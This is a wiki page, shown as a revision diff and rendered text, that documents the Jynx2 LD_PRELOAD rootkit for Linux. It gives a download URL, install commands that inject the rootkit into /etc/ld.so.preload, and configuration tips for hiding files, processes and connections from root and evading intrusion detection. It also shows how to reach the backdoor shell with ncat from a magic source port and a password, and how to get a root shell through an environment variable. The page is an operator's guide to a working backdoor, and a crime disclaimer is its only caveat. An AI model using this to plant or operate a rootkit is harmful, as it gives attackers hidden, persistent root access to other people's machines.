Difference between revisions of "Jynx Rootkit/2.0"
(→HIGH_PORT and LOW_PORT) |
|||
(39 intermediate revisions by 6 users not shown) | |||
Line 1: | Line 1: | ||
− | {{info|Jynx2 is an expansion of the | + | {{info|Jynx2 is an expansion of the [[Jynx Rootkit/1.0|original Jynx]] [[LD_Preload]] rootkit written in [[C]] with several modifications for multi-factor authentication, a more compatible shell drop, and additional hiding features.}} |
<strong> _ _,.-.' .-. | <strong> _ _,.-.' .-. | ||
_ .' |,' ."".| |.""._ | _ .' |,' ."".| |.""._ | ||
Line 48: | Line 48: | ||
\______/ | \______/ | ||
</strong> | </strong> | ||
+ | {{crime}} | ||
+ | <font size="-2">Special thanks to [[User:ErrorProne|ErrorProne]] and [[User:Xochipilli|xo]] for their contributions to this article.</font> | ||
=Features= | =Features= | ||
* Hiding from netstat | * Hiding from netstat | ||
Line 55: | Line 57: | ||
* Multi-factor authentication | * Multi-factor authentication | ||
* Improved anti-removal features | * Improved anti-removal features | ||
+ | * SUID Drop-shell with environment variable | ||
{{protip|It is possible to make Jynx2 even more difficult to remove by hooking [[C]]'s link() function, therefore we recommend that any [[LD_Preload]] rootkit be removed using a LiveCD.}} | {{protip|It is possible to make Jynx2 even more difficult to remove by hooking [[C]]'s link() function, therefore we recommend that any [[LD_Preload]] rootkit be removed using a LiveCD.}} | ||
− | |||
=Archive Contents= | =Archive Contents= | ||
[root@ares jynx2]# ls | [root@ares jynx2]# ls | ||
Makefile README config.h jynx2.c packer.sh reality.c | Makefile README config.h jynx2.c packer.sh reality.c | ||
{{info|In this rendition of jynx, two '''shared libraries''' are built by the installation process. One, '''jynx2.so''' functions as the actual rootkit, while the other, '''reality.so''', functions as a method for the remote access user to be able to see their own files and processes.}} | {{info|In this rendition of jynx, two '''shared libraries''' are built by the installation process. One, '''jynx2.so''' functions as the actual rootkit, while the other, '''reality.so''', functions as a method for the remote access user to be able to see their own files and processes.}} | ||
− | |||
=Configuration Options in Config.h= | =Configuration Options in Config.h= | ||
{{warning|Improper configuration of Jynx2 can result in severe system instability, including [[segmentation fault|segmentation faults]] of nearly every process on the infected host.}} | {{warning|Improper configuration of Jynx2 can result in severe system instability, including [[segmentation fault|segmentation faults]] of nearly every process on the infected host.}} | ||
==MAGIC_STRING== | ==MAGIC_STRING== | ||
− | MAGIC_STRING is the name of the directory that | + | * '''MAGIC_STRING''' is the name of the directory that jynx installs to from the top level directory '''/'''. By default, this directory is hidden from the root user via the magic '''UID''' and '''GID'''. If the '''MAGIC_STRING''' is set to "hiddendir", jynx2 will install to (and hide) the folder "/hiddendir".{{info|this can be used as a prefix to any files or processes that the user wishes to hide; it is not limited exclusively to Jynx2's installation directory.}} |
− | + | ||
− | + | ||
− | {{info|this can be used as a prefix to | + | |
==MAGIC_GID and MAGIC_UID== | ==MAGIC_GID and MAGIC_UID== | ||
* Similar to the original [[Jynx Rootkit]], Jynx2 will automatically hide processes, files, and connections owned by the magic UID or GID. | * Similar to the original [[Jynx Rootkit]], Jynx2 will automatically hide processes, files, and connections owned by the magic UID or GID. | ||
− | {{protip|Due to the fact that adding a user/group to the machine may set off a [[HIDS]], we recommend that the MAGIC_UID and MAGIC_GID be set to a commonly unused service user's information (e.g. cupsd or lp) for maximum [[IDS Evasion]], as no files will suddenly disappear and the least files in /etc/ will be modified.}} | + | {{protip|Due to the fact that adding a user/group to the machine may set off a [[HIDS]], we recommend that the MAGIC_UID and MAGIC_GID be set to a commonly unused service user's information (e.g. cupsd or lp's UID and GID) for maximum [[IDS Evasion]], as no files will suddenly disappear and the least files in /etc/ will be modified.}} |
− | + | ||
==REALITY_PATH== | ==REALITY_PATH== | ||
− | This is the path | + | * <i>This is the path where '''reality.so''' will be copied to. By default, Jynx2 will install this into /XxJynx/reality.so. </i>{{notice|It is recommended to set REALITY_PATH to '''/$MAGIC_STRING/reality.so''' in order to keep this file hidden from the root user.}} |
− | By default, Jynx2 will install this into / | + | |
− | + | ||
− | It is recommended | + | |
==CONFIG_FILE== | ==CONFIG_FILE== | ||
− | The CONFIG_FILE defaults to ld | + | {{info|The '''CONFIG_FILE''' defaults to ld.so.preload, which is commonly located in the /etc directory. Alternatively, services can be backdoored by setting the [[LD_Preload|LD_PRELOAD]] environment variable if overwriting /etc/ld.so.preload is unfavorable.}} |
− | + | ||
+ | ==MULTI-FACTOR AUTHENTICATION== | ||
+ | {{notice|'''<i>Jynx2 uses two-factor [[authentication credential|authentication]]. </i>'''{{code|text=With Jynx2, the MAGIC_ACK/MAGIC_SEQ port-knocking authentication method was deprecated in favor of HIGH_PORT, LOW_PORT, and an accept() hook. This means that Jynx2 can backdoor any existing listening service without interrupting normal user interactivity for that service.}}}} | ||
+ | The first are '''HIGH_PORT''' and '''LOW_PORT''', which default to 41, and 43 respectively. The source port of a client connection must fall between this port range in order to activate Jynx2's accept() hook. Because this port is typically reserved for inbound connections, it is rare that any connection will randomly have this origin port. | ||
+ | The second factor in Jynx2 authentication is SHELL_PASSWORD. This should be the first line sent to the backdoor upon connecting, defaulting to "'''DEFAULT_PASS'''", it should be changed before compilation. | ||
− | == | + | ==LIBC_PATH== |
− | + | LIBC_PATH is set in config.h and defines the path to the libc binary, which can be obtained by using ldd against any common coreutil or binutil. In order to locate this, simply run '''ldd $(which ls)''' or something similar. {{protip|On multi-lib systems, configure this path to point to the '''64-bit''' version of LIBC.}} | |
+ | ==ENV_VARIABLE== | ||
+ | A new feature in Jynx2 is the ability to drop a local suid shell using an environment variable as defined in the configuration. When this environment variable is set, SUID executables will grant root access to the local machine for [[privilege escalation]] by the remote user. | ||
− | + | =Download & Installation= | |
− | + | {{Info|It is highly recommended that configuration be changed before compiling or installing Jynx2 to any device.}} | |
− | + | * '''Download URL''': http://blackhatlibrary.net/releases/jynx2.tgz | |
− | + | ==Installation== | |
− | + | # tar xzf jynx2.tgz # Unpack tarball | |
− | + | # nano -w config.h # Set configuration | |
− | + | # make all # Compile jynx2.so | |
− | + | # make install # Installs jynx2, injects into ld preload, and sets correct GIDs | |
− | + | ==Usage== | |
− | + | Once Jynx2 is successfully installed on a target machine, accessing it's accept() hook with the default configuration looks like: | |
<pre> | <pre> | ||
− | sudo ncat exploit.net 80 -p | + | [user@host ~]$ sudo ncat exploit.net 80 -p 42 --ssl |
− | + | DEFAULT_PASS | |
− | + | ||
− | + | ||
− | + | ||
Bump with shell. | Bump with shell. | ||
>ls -lia | >ls -lia | ||
− | 214473 drwxr-xr-x 2 | + | 214473 drwxr-xr-x 2 user users 176 Mar 7 19:19 . |
− | 177137 drwxr-xr-x 15 | + | 177137 drwxr-xr-x 15 user users 952 Mar 5 22:15 .. |
− | </pre> | + | </pre>{{protip| Make sure to using the ''--ssl'' flag with ncat, otherwise Jynx2 will not accept the connection, with the connection's file descriptor being passed to the backdoored service in stead.}} |
+ | By default, with XxJynx as the ENV_VARIABLE configuration: | ||
+ | >XxJynx=1 gpasswd / | ||
+ | >id | ||
+ | uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log) | ||
− | = | + | =Further Reading= |
− | + | * [[C]] | |
− | + | * [[Jynx Rootkit/1.0|Jynx version 1.0]] | |
− | + | * [[LD_Preload]] | |
− | + | * [http://resources.infosecinstitute.com/jynx2-sneak-peek-analysis/ Jynx2 Sneak peek, Analysis and Removal Instructions (Infosec Institute)] | |
− | == | + | {{InHouse}}{{series |
+ | | Name = Jynx2 | ||
+ | | PartOf = Linux | ||
+ | }} | ||
+ | [[Category:Maintaining_Access]] |
Latest revision as of 08:33, 21 April 2013
Jynx2 is an expansion of the original Jynx LD_Preload rootkit written in C with several modifications for multi-factor authentication, a more compatible shell drop, and additional hiding features. |
_ _,.-.' .-. _ .' |,' ."".| |.""._ ( || ,',"". `._`' ` ' `. `\ | `" .-"`-..` . `. | `..--.._ | \ _,| _...'_.' ,+. `. ,""'| `...-'..""(__.._ -" `"--.. `. |`._,' ,' /\ .'""` .'""`. `. | `. \ ' / / / || || |.`.`. . | \ `.__,'-._' /|` -"' `-.' \ \ \ `"-' \ ' `. / /_| | |'""| | .-""'`'"`-,.-"\ . . / .\ . / | | `._.' || ,' \ \ ' / / |/ /_.-+._`-..--"-. . . \ ` / /.' ' ,'""'-. `"."'""'`.. |. \ \ / . | j . . | |\__," |. ` ' \ . | | | | ' | '| | ' ` \ \ . | | | `.____,' ..____,' | | . \ | | | | ._ _..---._ _,' | . ' | | | | | "" . |`"' \ `.| ' ' ' . | | | | | | | ` ` . . \ | | | | | | ' | \ `. | | . | ' ' | | | . ` \ \ | | | | \ ` | | | . `. | | | | \ \ ' | ` ' ` `+..|___|___|_........ \ \ \| ' . `. `. | `. \ . . ` `. `-. .' _,'`. \' . \ `-.._ `._ ,' _." `._ `.` | . `._ . `._ _,`"--`. | . `. | `-._ ,' | `. `|_ ,' | | `. `. .' __...__.| | \ __..._ _,..,.__ `. `-`"' `._..--'-.__ .' `-..' ``'"--..-' `"---' /$$$$$ /$$ /$$ /$$ /$$ |__ $$ | $$ /$$/|__/ | $$ | $$ /$$ /$$ /$$$$$$$ /$$ /$$ | $$ /$$/ /$$ /$$$$$$ | $$| $$ | $$| $$__ $$| $$ /$$//$$$$$$| $$$$$/ | $$|_ $$_/ /$$ | $$| $$ | $$| $$ \ $$ \ $$$$/|______/| $$ $$ | $$ | $$ | $$ | $$| $$ | $$| $$ | $$ >$$ $$ | $$\ $$ | $$ | $$ /$$ | $$$$$$/| $$$$$$$| $$ | $$ /$$/\ $$ | $$ \ $$| $$ | $$$$/ \______/ \____ $$|__/ |__/|__/ \__/ |__/ \__/|__/ \___/ /$$ | $$ | $$$$$$/ \______/
It is a crime to use techniques or tools on this page against any system without written authorization unless the system in question belongs to you |
Special thanks to ErrorProne and xo for their contributions to this article.
Contents
Features
- Hiding from netstat
- Hiding from ps/top and /proc
- File hiding
- SSL connect accept() hook
- Multi-factor authentication
- Improved anti-removal features
- SUID Drop-shell with environment variable
Archive Contents
[root@ares jynx2]# ls Makefile README config.h jynx2.c packer.sh reality.c
In this rendition of jynx, two shared libraries are built by the installation process. One, jynx2.so functions as the actual rootkit, while the other, reality.so, functions as a method for the remote access user to be able to see their own files and processes. |
Configuration Options in Config.h
Improper configuration of Jynx2 can result in severe system instability, including segmentation faults of nearly every process on the infected host. |
MAGIC_STRING
- MAGIC_STRING is the name of the directory that jynx installs to from the top level directory /. By default, this directory is hidden from the root user via the magic UID and GID. If the MAGIC_STRING is set to "hiddendir", jynx2 will install to (and hide) the folder "/hiddendir".
this can be used as a prefix to any files or processes that the user wishes to hide; it is not limited exclusively to Jynx2's installation directory. |
MAGIC_GID and MAGIC_UID
- Similar to the original Jynx Rootkit, Jynx2 will automatically hide processes, files, and connections owned by the magic UID or GID.
REALITY_PATH
- This is the path where reality.so will be copied to. By default, Jynx2 will install this into /XxJynx/reality.so. Notice: It is recommended to set REALITY_PATH to /$MAGIC_STRING/reality.so in order to keep this file hidden from the root user.
CONFIG_FILE
The CONFIG_FILE defaults to ld.so.preload, which is commonly located in the /etc directory. Alternatively, services can be backdoored by setting the LD_PRELOAD environment variable if overwriting /etc/ld.so.preload is unfavorable. |
MULTI-FACTOR AUTHENTICATION
With Jynx2, the MAGIC_ACK/MAGIC_SEQ port-knocking authentication method was deprecated in favor of HIGH_PORT, LOW_PORT, and an accept() hook. This means that Jynx2 can backdoor any existing listening service without interrupting normal user interactivity for that service. |
The first are HIGH_PORT and LOW_PORT, which default to 41, and 43 respectively. The source port of a client connection must fall between this port range in order to activate Jynx2's accept() hook. Because this port is typically reserved for inbound connections, it is rare that any connection will randomly have this origin port. The second factor in Jynx2 authentication is SHELL_PASSWORD. This should be the first line sent to the backdoor upon connecting, defaulting to "DEFAULT_PASS", it should be changed before compilation.
LIBC_PATH
LIBC_PATH is set in config.h and defines the path to the libc binary, which can be obtained by using ldd against any common coreutil or binutil. In order to locate this, simply run ldd $(which ls) or something similar.
ENV_VARIABLE
A new feature in Jynx2 is the ability to drop a local suid shell using an environment variable as defined in the configuration. When this environment variable is set, SUID executables will grant root access to the local machine for privilege escalation by the remote user.
Download & Installation
It is highly recommended that configuration be changed before compiling or installing Jynx2 to any device. |
- Download URL: http://blackhatlibrary.net/releases/jynx2.tgz
Installation
# tar xzf jynx2.tgz # Unpack tarball # nano -w config.h # Set configuration # make all # Compile jynx2.so # make install # Installs jynx2, injects into ld preload, and sets correct GIDs
Usage
Once Jynx2 is successfully installed on a target machine, accessing it's accept() hook with the default configuration looks like:
[user@host ~]$ sudo ncat exploit.net 80 -p 42 --ssl DEFAULT_PASS Bump with shell. >ls -lia 214473 drwxr-xr-x 2 user users 176 Mar 7 19:19 . 177137 drwxr-xr-x 15 user users 952 Mar 5 22:15 ..
By default, with XxJynx as the ENV_VARIABLE configuration:
>XxJynx=1 gpasswd / >id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log)
Further Reading
- C
- Jynx version 1.0
- LD_Preload
- Jynx2 Sneak peek, Analysis and Removal Instructions (Infosec Institute)
|
Jynx2 Visit the Linux Portal for complete coverage.
|